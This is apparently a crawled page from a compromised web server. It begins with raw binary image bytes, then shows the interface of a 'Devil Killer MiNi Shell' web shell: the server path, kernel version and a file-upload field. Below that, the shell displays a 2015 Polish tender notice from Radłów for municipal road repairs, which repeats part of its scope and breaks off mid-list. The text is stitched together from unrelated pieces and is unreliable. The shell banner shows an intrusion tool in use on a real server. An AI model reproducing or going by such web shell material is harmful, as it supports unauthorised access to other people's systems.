JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150223/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150223/39938-N-2015.html

<p class="kh_header"><b>Radłów: REMONT DRÓG GMINNYCH W MIEJSCOWOŚCI ZDROCHEC, MARCINKOWICE, PRZYBYSŁAWICE, ZABAWA ORAZ PRZEBUDOWA PRZEPUSTU POD DROGĄ GMINĄ W MIEJSCOWOŚCI MARCINKOWICE</b><br>
<b>Numer ogłoszenia: 39938 - 2015; data zamieszczenia: 23.02.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski w  Radłowie , ul. Kolejowa 7, 33-130 Radłów, woj. małopolskie, tel. 14 6782044, faks 14 6782818.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gminaradlow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> REMONT DRÓG GMINNYCH W MIEJSCOWOŚCI ZDROCHEC, MARCINKOWICE, PRZYBYSŁAWICE, ZABAWA ORAZ PRZEBUDOWA PRZEPUSTU POD DROGĄ GMINĄ W MIEJSCOWOŚCI MARCINKOWICE.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> REMONT DRÓG GMINNYCH W MIEJSCOWOŚCI ZDROCHEC, MARCINKOWICE, PRZYBYSŁAWICE, ZABAWA ORAZ PRZEBUDOWA PRZEPUSTU POD DROGĄ GMINĄ 
W MIEJSCOWOŚCI MARCINKOWICE.

W skład zadania wchodzi:
I. Remont dróg w ramach usuwania skutków klęsk żywiołowych: 
1. Remont drogi gminnej Przez Wieś nr 200124K nr dz. ewid.  305/3 i 305/1  
miejscowości  Zdrochec w km 0+000-0+890,
Roboty przygotowawcze i rozbiórkowe

Roboty pomiarowe przy liniowych robotach ziemnych - trasa drogi w terenie równinnym -                   0,890 km, 
Roboty remontowe - frezowanie nawierzchni bitumicznej o gr. 4 cm z wywozem materiału 
z rozbiórki na odległość do 1 km - 460,00 m2,
Wzmocnienie uszkodzonej krawędzi jezdni
Rozebranie nawierzchni z mas mineralno-bitumicznych gr. 4 cm mechanicznie (150mb x 2,0m) - 300 m2,
Roboty ziemne wykonywane koparkami podsiębiernymi o poj. łyżki 0.25 m3 w gr. kat. III                        z transp. urobku na odl. do 1 km sam. samowyład. - 150mb x 2,0m x 0,5m gł. - 150m3,
Warstwa dolna podbudowy z kruszyw łamanych gr. 25 cm - 300 m2,
Warstwa górna podbudowy z kruszyw łamanych gr. 15 cm - 300 m2
Nawierzchnie z mieszanek mineralno-bitumicznych asfaltowych o grubości 5 cm (warstwa wiążąca) - krotność = 2 - 300 m2,
Warstwa przeciwspękaniowa pod warstwy bitumiczne - siatka o szer. 1,0m - 150 m2,
Nawierzchnia
Oczyszczenie mechaniczne nawierzchni drogowych bitumicznych - 4918 m2 
Skropienie asfaltem nawierzchni drogowych (pod profil i ścieralną) - 9836 m2,
Wyrównanie istniejącej podbudowy mieszanką mineralno-bitumiczną asfaltową mechaniczne - 553 ton,
Nawierzchnie z mieszanek mineralno-bitumicznych asfaltowych o grubości 4 cm (warstwa ścieralna) - 4918 m2
Pobocza i rowy
Mechaniczne ścinanie poboczy o grub. 10 cm - 1780 m
Oczyszczenie rowów z namułu o grub. 30 cm z wyprofilowaniem skarp rowu - 1080 m
Warstwa górna podbudowy z kruszyw łamanych gr. 10 cm - pobocza - 890 m2.
2.Remont drogi gminnej Przez Wieś nr 200129K  nr dz. ewid. 1275 w miejscowości                                     Marcinkowice w km 0+000 - 0+900,
Roboty przygotowawcze i rozbiórkowe
Roboty pomiarowe przy liniowych robotach ziemnych - trasa drogi w terenie równinnym -                   0,900 km, 
Roboty remontowe - frezowanie nawierzchni bitumicznej o gr. 4 cm z wywozem materiału z rozbiórki na odległość do 1 km - 490,00 m2,
Wzmocnienie uszkodzonej krawędzi jezdni
Rozebranie nawierzchni z mas mineralno-bitumicznych gr. 4 cm mechanicznie (50mb x 2,0m) - 100 m2,
Roboty ziemne wykonywane koparkami podsiębiernymi o poj. łyżki 0.25 m3 w gr. kat. III                        z transp. urobku na odl. do 1 km sam. samowyład. - 50mb x 2,0m x 0,5m gł. - 50 m3,
Warstwa dolna podbudowy z kruszyw łamanych gr. 25 cm - 100 m2,
Warstwa górna podbudowy z kruszyw łamanych gr. 15 cm - 100 m2,
Nawierychnie z mieszanek mineralno-bitumicznych asfaltowych o grubości 5 cm (warstwa wiążąca) - krotność = 2 - 100 m2,
Warstwa przeciwspękaniowa pod warstwy bitumiczne - siatka o szer. 1,0m - 50 m2,
Nawierzchnia
Oczyszczenie mechaniczne nawierzchni drogowych bitumicznych - 4680 m2 
Skropienie asfaltem nawierzchni drogowych (pod profil i ścieralną) - 9360 m2,
Wyrównanie istniejącej podbudowy mieszanką mineralno-bitumiczną asfaltową mechaniczne - 527 ton,
Nawierzchnie z mieszanek mineralno-bitumicznych asfaltowych o grubości 4cm (warstwa ścieralna) - 4680 m2
Pobocza i rowy
Mechaniczne ścinanie poboczy o grub. 10 cm - 1800 m
Warstwa górna podbudowy z kruszyw łamanych gr. 10 cm - pobocza - 900 m2.
3.	Remont drogi gminnej Przez Wieś nr 200139K  nr dz. ewid. 2167 w miejscowości                                     Przybysławice w km 0+000-0+973,
Roboty przygotowawcze i rozbiórkowe
Roboty pomiarowe przy liniowych robotach ziemnych - trasa drogi w terenie równinnym -                   0,973 km, 
Roboty remontowe - frezowanie nawierzchni bitumicznej o gr. 4 cm z wywozem materiału z rozbiórki na odległość do 1 km - 1400 m2,
Poprawa odwodnienia powierzchniowego drogi - wykonanie ścieku przykrawężnikowego
Roboty remontowe - cięcie piłą nawierzchni bitumicznych na gł. 6-10 cm - 230 m,
Rozebranie nawierzchni z mas mineralno-bitumicznych gr. 4 cm mechanicznie (230mb x 0,5m) - krotność = 2 -  115 m2,
Nawierzchnie z kostki brukowej betonowej grub. 6 cm na podsypce cementowo- piaskowej - ściek przykrawężnikowy o szer. 20cm z 2 rzędów kostki betonowej - 230 m,
Poprawa odwodnienia powierzchniowego drogi - regulacja i niwelowanie istniejącego ścieku przykrawężnikowego.
Roboty remontowe - cięcie piłą nawierzchni bitumicznych na gł. 6-10 cm - 80 m,
Rozebranie ścieków z elementów betonowych o grub. 10 cm na podsypce cementowo-piaskowej - 80 m,
Nawierzchnie z kostki brukowej betonowej grub. 6 cm na podsypce cementowo- piaskowej - ściek przykrawężnikowy o szer. 20cm z 2 rzędów kostki betonowej - 80 m,
Poprawa odwodnienia powierzchniowego drogi - kratki ściekowe
Regulacja pionowa studzienek dla kratek ściekowych ulicznych - 3 szt.,
Roboty ziemne wykonywane koparkami podsiębiernymi o poj. łyżki 0.15 m3 w gr. kat. III z transportem urobku samochód. samowyładowczymi na odległość do 1 km - 10 m3,
Kanały z rur PVC łączonych na wcisk o śr. zewn. 200 mm - przykanaliki - 25 m,
Studzienki ściekowe uliczne betonowe o śr.500 mm z osadnikiem bez syfonu - 4 szt.,
Przełożenie i niwelacja i istniejącego chodnika
Ręczne rozebranie nawierzchni z kostki kamiennej regularnej na podsypce piaskowej - kostka brukowa betonowa do ponownego wbudowania - 68 m2,
Rozebranie krawężników betonowych na podsypce cementowo-piaskowej - do ponownego wbudowania - 51 m,
Rozebranie obrzeży trawnikowych o wymiarach 8x30 cm na podsypce piaskowej - do ponownego ułożenia - 51 m,
Rozebranie ław pod krawężniki z betonu - 5,5 m3,
Krawężniki betonowe wystające o wym. 15x30 cm na podsypce cem. piaskowej - materiał 
z odzysku - 51 m,
Ława pod krawężniki betonowa z oporem - 4,5 m3,
Obrzeża betonowe o wym. 30x8 cm na podsypce cem. piaskowej z wyp. spoin zaprawą cem. - materiał z odzysku - 51 m,
Ława pod krawężniki betonowa zwykła - obrzeża - 1,5 m3,
Warstwa górna podbudowy z kruszyw łamanych gr. 10 cm Krotność = 2 - 68 m2,
Chodniki z kostki brukowej betonowej grubości 6 cm na podsypce cementowo piaskowej  z wypełnieniem spoin piaskiem - materiał z odzysku - 68 m2,
Nawierzchnia
Oczyszczenie mechaniczne nawierzchni drogowych bitumicznych - 5605 m2
Skropienie asfaltem nawierzchni drogowych (pod profil i ścieralną) - 11210 m2,
Wyrównanie istniejącej podbudowy mieszanką mineralno-bitumiczną asfaltową mechaniczne - 630 ton,
Nawierzchnie z mieszanek mineralno-bitumicznych asfaltowych o grubości 4 cm (warstwa ścieralna) - 5605 m2
Pobocza
Mechaniczne ścinanie poboczy o grub. 10 cm - 862 m
Warstwa górna podbudowy z kruszyw łamanych gr. 10 cm - pobocza - 431 m2.

4.	Remont drogi gminnej Podwale nr 200115K  nr dz. ewid. 65/3 w miejscowości Zabawa w km 0+000-0+420.
Przygotowanie nawierzchni
Naprawy dróg gruntowych - profilowanie - 420mb - 1890 m2,
Nawierzchnia
Warstwa górna podbudowy z kruszyw łamanych gr. 8 cm - 1386 m2,
Nawierzchnie z mieszanek mineralno-bitumicznych asfaltowych o grubości 4 cm (warstwa wiążąca) - 1260 m2,
Nawierzchnie z mieszanek mineralno-bitumicznych asfaltowych o grubości 4 cm (warstwa ścieralna) - 1260 m2,
Pobocza
Warstwa górna podbudowy z kruszyw łamanych gr. 10 cm - krotność = 2 -  pobocza - 420 m2 

II.	Przebudowa istniejącego przepustu pod drogą gminną nr 200129K  nr dz. ewid. 1275                                     w Marcinkowicach.
Ustawienie, utrzymanie i likwidacja oznakowania na czas robót - 1 kpl.,
Roboty przygotowawcze
Odtworzenie trasy i punktów wysokościowych - 0,1 km,
Geodezyjna inwentaryzacja powykonawcza - 1 kpl.,
Usunięcie warstwy humusu - 40 m2,
Rozbiórki elementów dróg, ogrodzeń i przepustów
Rozebranie przepustów pod zjazdami fi800 - 8 mb,
Rozebranie nawierzchni pobocza gr.20cm (zaglinione kruszywo) - 11 m2,
Rozebranie podbudowy z kruszywa gr.62cm (zaglinione kruszywo, piasek, żwir) - 44 m2,
Frezowanie warstw bitumicznych na połączeniu nawierzchni istniejącej z poszerzeniem - gr. 8cm - - 44 m2,
Załadowanie gruzu z transp sam. samowyładowczymi do 1km - 32,422 m3,
Następne 10 km  - 32,422 m3,
Utylizacja - 51,8752 ton.
Odwodnienie korpusu drogowego - kanalizacja deszczowa
Przepust WIPRO 1200mm - 8,6 mb,
Podłoża z materiałów sypkich podsypka piaskowa gr 20cm - 15 m2,
Podłoża z materiałów sypkich obsypka piaskowa gr 30cm - 15 m2,
Umocnienie ścian wykopów z rozbiórką palami szalunkowymi stalowymi lub deskowaniem - 60 m2
Wykopy liniowe pod przepust - mechaniczne 80% wraz z wywozem i utylizacją - 63 m3,
Wykopy liniowe pod przepust - ręcznie 20% wraz z wywozem i utylizacją - 16 m3,
Wykonanie nasypu z gruntu niewysadzinowego - 2,0 m3,
Zasypanie wykopów liniowych gł. do 3m szer. 2m (materiał z przywozu pospółka) - 44,2 m3,
Wykonanie ścianek czołowych przepustu dla rur o średnicy 1200mm zbrojony - 2,0  szt.,
Wywóz i utylizacja gruntu - 158,0 ton,
Betonowe  płyty ażurowe na podsypce cementowo-piaskowej - 21,0 m2,
Podbudowy
Profilowanie i zagęszczenia podłoża pod warstw konstrukcyjne nawierzchni  - 91 m2,
Oczyszczenie i skropienie warstw
Oczyszczenie i skropienie warstw mechanicznie  emulsją asfaltową - 92,0 m2
Ulepszone podłoże
wykonanie warstwy ulepszonego podłoża z kruszywa naturalnego o gr. 35cm - fundament pod przepust - 13,0 m2,
       Wykonanie podbudowy z kruszywa łamanego stabilizowanego mechanicznie
Wykonanie pobocza z kruszywa łamanego 0/31.5 stabilizowanego mechanicznie o gr 20cm - 45 m2,
Wykonanie podbudowy z kruszywa łamanego 0/31.5 stabilizowanego mechanicznie o gr 20cm - 46 m2,
Wykonanie podbudowy z kruszywa łamanego 0/63 stabilizowanego mechanicznie o gr 20cm - 46 m2,
Warstwa podbudowy AC 16P o gr. 8cm z asfaltem drogowym - 46 m2,
        Wykonanie nawierzchni z betonu asfaltowego o uziarnieniu 0/11, warstwa ścieralna
Warstwa ścieralna - AC 11S z asfaltem drogowym - 4cm - 46 m2,
       Oznakowanie poziome
Oznakowanie poziome jezdni materiałami cienkowarstwowymi (farby)  - 11,2 m2,
 Bariera
Bariera N2W4A - 24,0 m

Nawierzchnie z mieszanek mineralno-bitumicznych asfaltowych o grubości 4 cm (warstwa ścieralna) - 1260 m2,
Pobocza Warstwa górna podbudowy z kruszyw łamanych gr. 10 cm - krotność = 2 -  pobocza - 420 m2 
II.Przebudowa istniejącego przepustu pod drogą gminną nr 200129K  nr dz. ewid. 1275 w Marcinkowicach.
Ustawienie, utrzymanie i likwidacja oznakowania na czas robót - 1 kpl.,
Roboty przygotowawcze
Odtworzenie trasy i punktów wysokościowych - 0,1 km,
Geodezyjna inwentaryzacja powykonawcza - 1 kpl.,
Usunięcie warstwy humusu - 40 m2,
Rozbiórki elementów dróg, ogrodzeń i przepustów
Rozebranie przepustów pod zjazdami fi800 - 8 mb,
Rozebranie nawierzchni pobocza gr.20cm (zaglinione kruszywo) - 11 m2,
Rozebranie podbudowy z kruszywa gr.62cm (zaglinione kruszywo, piasek, żwir) - 44 m2,
Frezowanie warstw bitumicznych na połączeniu nawierzchni istniejącej z poszerzeniem - gr. 8cm - - 44 m2,
Załadowanie gruzu z transp sam. samowyładowczymi do 1km - 32,422 m3,
Następne 10 km  - 32,422 m3,
Utylizacja - 51,8752 ton.
Odwodnienie korpusu drogowego - kanalizacja deszczowa
Przepust WIPRO 1200mm - 8,6 mb,
Podłoża z materiałów sypkich podsypka piaskowa gr 20cm - 15 m2,
Podłoża z materiałów sypkich obsypka piaskowa gr 30cm - 15 m2,
Umocnienie ścian wykopów z rozbiórką palami szalunkowymi stalowymi lub deskowaniem - 60 m2
Wykopy liniowe pod przepust - mechaniczne 80% wraz z wywozem i utylizacją - 63 m3,
Wykopy liniowe pod przepust - ręcznie 20% wraz z wywozem i utylizacją - 16 m3,
Wykonanie nasypu z gruntu niewysadzinowego - 2,0 m3,
Zasypanie wykopów liniowych gł. do 3m szer. 2m (materiał z przywozu pospółka) - 44,2 m3,
Wykonanie ścianek czołowych przepustu dla rur o średnicy 1200mm zbrojony - 2,0  szt.,
Wywóz i utylizacja gruntu - 158,0 ton,
Betonowe  płyty ażurowe na podsypce cementowo-piaskowej - 21,0 m2,
Podbudowy
Profilowanie i zagęszczenia podłoża pod warstw konstrukcyjne nawierzchni  - 91 m2,
Oczyszczenie i skropienie warstw
Oczyszczenie i skropienie warstw mechanicznie  emulsją asfaltową - 92,0 m2
Ulepszone podłoże wykonanie warstwy ulepszonego podłoża z kruszywa naturalnego o gr. 35cm - fundament pod przepust - 13,0 m2,
Wykonanie podbudowy z kruszywa łamanego stabilizowanego mechanicznie
Wykonanie pobocza z kruszywa łamanego 0/31.5 stabilizowanego mechanicznie o gr 20cm - 45 m2,
Wykonanie podbudowy z kruszywa łamanego 0/31.5 stabilizowanego mechanicznie o gr 20cm - 46 m2,
Wykonanie podbudowy z kruszywa łamanego 0/63 stabilizowanego mechanicznie o gr 20cm - 46 m2,
Warstwa podbudowy AC 16P o gr. 8cm z asfaltem drogowym - 46 m2,
 Wykonanie nawierzchni z betonu asfaltowego o uziarnieniu 0/11, warstwa ścieralna
Warstwa ścieralna - AC 11S z asfaltem drogowym - 4cm - 46 m2,
Oznakowanie poziome
Oznakowanie poziome jezdni materiałami cienkowarstwowymi (farby)  - 11,2 m2,
 Bariera
Bariera N2W4A - 24,0 m.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.42-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępujący do przetargu Wykonawca jest zobowiązany wnieść wadium w wysokości: 15.000,00 zł (słownie: piętnaście tysięcy złotych 00/100).
Wadium musi być wniesione przed upływem terminu składania ofert tj. do dnia 10.03.2015 r. do godz. 1200.
Wadium może być wniesione w jednej lub kilku wymienionych poniżej  formach:
pieniądzu
poręczeniach  bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym
gwarancjach bankowych
gwarancjach ubezpieczeniowych 
poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158 z późniejszymi zmianami)
1.	wadium wnoszone w formie pieniężnej należy wpłacić przelewem na rachunek bankowy w Banku Spółdzielczym Rzemiosła Oddział Radłów Nr 10858900060240000000260004 z dopiskiem wpłata wadium - sprawa nr PPI.271.5.15
2.	wadium wnoszone w formie poręczenia bankowego, gwarancji bankowej, gwarancji ubezpieczeniowej poręczeń udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158                        z późniejszymi zmianami), Wykonawca winien złożyć w formie oryginału w Kasie Urzędu Miejskiego w Radłowie lub załączyć w formie oryginału do oferty, w takim przypadku oferta musi zawierać także kopię tych dokumentów zgodnie z wymaganiami pkt 9.3 SIWZ.
      Kasa Urzędu Miejskiego w Radłowie czynna jest w godzinach pracy Urzędu.
WYKONAWCA, KTÓREGO OFERTA  NIE ZOSTAŁA ZABEZPIECZONA  WADIUM 
W WYMAGANEJ FORMIE LUB NIE ZAWIERA POTWIERDZENIA WNIESIENIA  WADIUM  BĘDZIE  WYKLUCZONY.
Wadium będzie zwrócone w terminie i na warunkach wskazanych w art. 46 ust. 1 - 4 ustawy Prawo zamówień publicznych .
Zamawiający zatrzymuje wadium wraz z odsetkami jeśli wystąpią okoliczności wymienione w art. 46 ust. 4a lub 5 ustawy.
Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie art. 46 ust. 1 ustawy, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający będzie dokonywał oceny spełniania w/w warunków metodą spełnia / nie spełnia na podstawie treści złożonych przez wykonawcę oświadczeń i dokumentów które należy dołączyć do oferty, tj.:
a.oświadczenie o spełnieniu warunków udziału w postępowaniu o których mowa w art. 22 ust. 1 Ustawy Prawo Zamówień Publicznych - Załącznik nr 2</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający będzie dokonywał oceny spełniania w/w warunków metodą spełnia / nie spełnia na podstawie treści złożonych przez wykonawcę oświadczeń i dokumentów które należy dołączyć do oferty, tj.:
a.oświadczenie o spełnieniu warunków udziału w postępowaniu o których mowa w art. 22 ust. 1 Ustawy Prawo Zamówień Publicznych - Załącznik nr 2
b.wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone - Załącznik nr 4</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający będzie dokonywał oceny spełniania w/w warunków metodą spełnia / nie spełnia na podstawie treści złożonych przez wykonawcę oświadczeń i dokumentów które należy dołączyć do oferty, tj.:
a.oświadczenie o spełnieniu warunków udziału w postępowaniu o których mowa w art. 22 ust. 1 Ustawy Prawo Zamówień Publicznych - Załącznik nr 2</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający będzie dokonywał oceny spełniania w/w warunków metodą spełnia / nie spełnia na podstawie treści złożonych przez wykonawcę oświadczeń i dokumentów które należy dołączyć do oferty, tj.:
a.oświadczenie o spełnieniu warunków udziału w postępowaniu o których mowa w art. 22 ust. 1 Ustawy Prawo Zamówień Publicznych - Załącznik nr 2</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający będzie dokonywał oceny spełniania w/w warunków metodą spełnia / nie spełnia na podstawie treści złożonych przez wykonawcę oświadczeń i dokumentów które należy dołączyć do oferty, tj.:
a.oświadczenie o spełnieniu warunków udziału w postępowaniu o których mowa w art. 22 ust. 1 Ustawy Prawo Zamówień Publicznych - Załącznik nr 2
b.oryginał lub kopia opłaconej polisy, a przypadku jej braku inny dokument potwierdzający że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. 

Zamawiający uzna, że warunek został spełniony jeżeli Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie mniejszą niż zaoferowana cena za wykonanie przedmiotu zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
